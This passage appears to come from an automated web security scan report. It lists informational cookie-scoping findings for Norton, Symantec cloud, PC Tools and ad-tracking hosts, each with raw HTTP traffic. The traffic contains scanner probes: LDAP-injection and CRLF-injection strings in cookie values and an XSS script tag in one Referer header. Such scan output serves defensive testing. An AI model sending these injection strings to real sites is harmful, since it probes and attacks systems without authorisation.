Set-Cookie: LANGUAGE=en; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:16; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
Set-Cookie: TrafficSourceCookieName=trf_id:symcom; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
Set-Cookie: OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
Set-Cookie: CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 413

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://buy.norton.com/estore/mf/la
...[SNIP]...

9.16. http://buy.norton.com/ps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://buy.norton.com
Path:   /ps

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ps HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:23 GMT
Location: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=18a29e71-5447-4147-9046-865f8a1fce521315604243554
Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=US; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
Set-Cookie: LANGUAGE=en; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:37:23; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
Set-Cookie: TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
Set-Cookie: OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
Set-Cookie: CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 413

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://buy.norton.com/estore/mf/la
...[SNIP]...

9.17. http://buy.norton.com/special-promotions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://buy.norton.com
Path:   /special-promotions

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /special-promotions HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:25 GMT
Location: http://buy.norton.com/estore/mf/landingPromotion?rdid=4d1e0611-4d59-4d29-9f22-ad1cbf72a98d1315604245447
Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=US; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: LANGUAGE=en; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:37:25; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 401

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://buy.norton.com/estore/mf/la
...[SNIP]...

9.18. http://buy.norton.com/support  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://buy.norton.com
Path:   /support

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /support HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:38:21 GMT
Location: http://www.norton.com/onlinehelp
Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=*)!(sn=*)!(sn=*; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: LANGUAGE=*)!(sn=*)!(sn=*; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: CurrentSubChannelCookieName=Unknown; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 259

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://www.norton.com/onlinehelp">
...[SNIP]...

9.19. http://buy.norton.com/upgrades-renewals  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://buy.norton.com
Path:   /upgrades-renewals

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /upgrades-renewals?ctry=US&lang=EN&trf_id=symcom&inid=us_hho_errorpage_to_store HTTP/1.1
Host: buy.norton.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1315621900063-New%7C1336357900063%3B%20event69%3Devent69%7C1336357900064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_sv_sid%3D760290967935%3B; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/2; s_sv_112_s1=1@16@a//1315621902268; JSESSIONID=LyytTqFG2snPQBSzMGKlyR2Ll6W2nTt9yvvmMtQHvQcdVXB18rCT!-50551110; FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16; BIGipServerbuy1_prd_SSL=4046749583.16671.0000; COUNTRY=US; LANGUAGE=en; PROGRAMID_CREATED_DATE=09-09-2011; PROGRAMID=; PROGRAM_TYPE=UNKNOWN; LASTTIME_CV_DATE=Sep-09-2011 14:31:18; TrafficSourceCookieName=trf_id:symcom; OriginalSubChannelCookieName=Online (1st); CurrentSubChannelCookieName=Online (1st); symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; AKNORT=0; mbox=check#true#1315621970|session#1315621887128-280442#1315623770|PC#1315621887128-280442.19#1316831510|profile#+_COUNTRY-US+_LANGUAGE-en+_TRAFFIC_SOURCE-trf_id%3Asymcom+_PGM_TYPE-UNKNOWN+_SUBCHANNEL-Online%20%281st%29+_ORIG_SUB-Online%20%281st%29#1380421910; s_eVar63=%5B%5B'store%253Atrf_id%253Asymcom'%2C'1315621909811'%5D%5D; s_eVar65=%5B%5B'store%253Aonline%2520%25281st%2529'%2C'1315621909812'%5D%5D; s_cc=true

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache="set-cookie"
Date: Fri, 09 Sep 2011 21:31:20 GMT
Location: http://buy.norton.com/estore/mf/upgradeRenewal?rdid=5c55d1c3-a981-4fb5-9327-d629b62b51071315603880402
Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=US; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LANGUAGE=en; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID=; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:18; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=US; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
Set-Cookie: LANGUAGE=EN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:20; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
Set-Cookie: TrafficSourceCookieName=trf_id:symcom; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
Set-Cookie: OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
Set-Cookie: CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 397

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://buy.norton.com/estore/mf/up
...[SNIP]...

9.20. http://buy.symanteccloud.com/freetrial  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://buy.symanteccloud.com
Path:   /freetrial

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /freetrial HTTP/1.1
Host: buy.symanteccloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:38:21 GMT
Location: http://buy.symanteccloud.com/estore/mf/smbEmailTrialPage?sfid=LsGRTqHN43HsnsxPPpQZP3Tj9CJ21WWwv1yRwH0vnzd82cf97GNT!334566439!1315604301412
Set-Cookie: COUNTRY=US; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LANGUAGE=en; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID=; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=US; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: LANGUAGE=en; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: PROGRAMID=; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: TrafficSourceCookieName=other; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: JSESSIONID=LsGRTqHN43HsnsxPPpQZP3Tj9CJ21WWwv1yRwH0vnzd82cf97GNT!334566439; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close
Content-Length: 471

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://buy.symanteccloud.com/estor
...[SNIP]...

9.21. http://buy.symanteccloud.com/smbstore  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://buy.symanteccloud.com
Path:   /smbstore

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /smbstore HTTP/1.1
Host: buy.symanteccloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:38:21 GMT
Location: http://buy.symanteccloud.com/estore/mf/smbHomePage?sfid=BcWpTqHN0cLLbNtj50T02T9jsChhh86cK9wmykNgQsTJZ1p4QRP9!334566439!1315604301665
Set-Cookie: COUNTRY=US; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LANGUAGE=en; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID=; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=US; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: LANGUAGE=en; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: PROGRAMID=; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: TrafficSourceCookieName=other; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: JSESSIONID=BcWpTqHN0cLLbNtj50T02T9jsChhh86cK9wmykNgQsTJZ1p4QRP9!334566439; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close
Content-Length: 459

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://buy.symanteccloud.com/estor
...[SNIP]...

9.22. http://free.pctools.com/res/js/utils.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://free.pctools.com
Path:   /res/js/utils.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /res/js/utils.php HTTP/1.1
Host: free.pctools.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://free.pctools.com/free-antivirus36661%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E55a70ea0c85/
Cookie: reftrack=freesite%2320110909170147; PHPSESSID=68o0726o7nflfg28ire9iju5j2

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.3.4
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Fri, 09 Sep 2011 22:05:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 09 Sep 2011 22:05:27 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: referrer=deleted; expires=Thu, 09-Sep-2010 21:01:50 GMT; path=/; domain=.pctools.com
Set-Cookie: reftrack=freesite%2320110909170147; expires=Sat, 08-Sep-2012 21:01:51 GMT; path=/; domain=.pctools.com


9.23. http://mbox3.offermatica.com/m2/verisign/mbox/standard  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mbox3.offermatica.com
Path:   /m2/verisign/mbox/standard

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m2/verisign/mbox/standard?mboxHost=www.verisign.com&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxPage=1315621506825-922680&mboxXDomain=enabled&mboxCount=1&protocol=http%3A&serverDomain=www.verisign.com&referrer=none&mbox=VRSN_HP_AccBox_2011&mboxId=0&mboxURL=http%3A//www.verisign.com/&mboxReferrer=&mboxVersion=31 HTTP/1.1
Host: mbox3.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxPC=1315621455064-973488.19

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1315621455064-973488.19; Domain=offermatica.com; Expires=Sun, 09-Oct-2011 21:24:38 GMT; Path=/m2/verisign
Content-Type: text/javascript
Content-Length: 154
Date: Fri, 09 Sep 2011 21:24:37 GMT
Server: Test & Target

mboxFactoryDefault.get('VRSN_HP_AccBox_2011',0).setOffer(new mboxOfferDefault()).loaded();mboxFactoryDefault.getPCId().forceId("1315621455064-973488.19");

9.24. http://sales.liveperson.net/hc/2735064/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/2735064/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/2735064/?&site=2735064&cmd=mTagStartPage&lpCallId=480831184191-637837637215&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/landingProductFeatures%3Frdid%3D8504bbeb-1b35-477e-abfe-b3f645ab12841315603878013&id=3141287025&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&PV%21unit=norton-estore-us&PV%21iproducts=na&PV%21offered_sku_desc_int=na&PV%21pagename=store%3Aus%3Ahho%20mf%3Ahomepage%3Ahomepage&PV%21ucproduct=na&PV%21offered_sku_desc=na&PV%21billingerror=false&PV%21pageLoadTime=1%20sec&PV%21visitorActive=1&SV%21language=english&SV%21traffic_source=store%3Atrf_id%3Asymcom&SV%21current_subchannel=store%3Aonline%20%281st%29&SV%21language=en&SV%21site_id=store%3Aus&SV%21country=us&SV%21incoming_productSKU=&SV%21session_guid=359A5BC1-187B-E37B-9025-A486DEF7EF50&SV%21partner=store%3Asymantec&title=Norton%20Security%20-%20Antivirus%20Software%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=8504bbeb-1b35-477e-abfe-b3f645ab12841315603878013
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=3716944001314187740; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603882871

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: LivePersonID=-5110247826455-1315603885:0; expires=Sat, 08-Sep-2012 21:31:25 GMT; path=/hc/2735064; domain=.liveperson.net
Set-Cookie: HumanClickKEY=3716944001314187740; path=/hc/2735064
Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064
Set-Cookie: LivePersonID=-5110247826455-1315603885:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:31:25 GMT; path=/hc/2735064; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:31:25 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1998

lpConnLib.Process({"ResultSet": {"lpCallId":"480831184191-637837637215","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton
...[SNIP]...

9.25. http://sales.liveperson.net/hc/71097838/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/71097838/

Issue detail

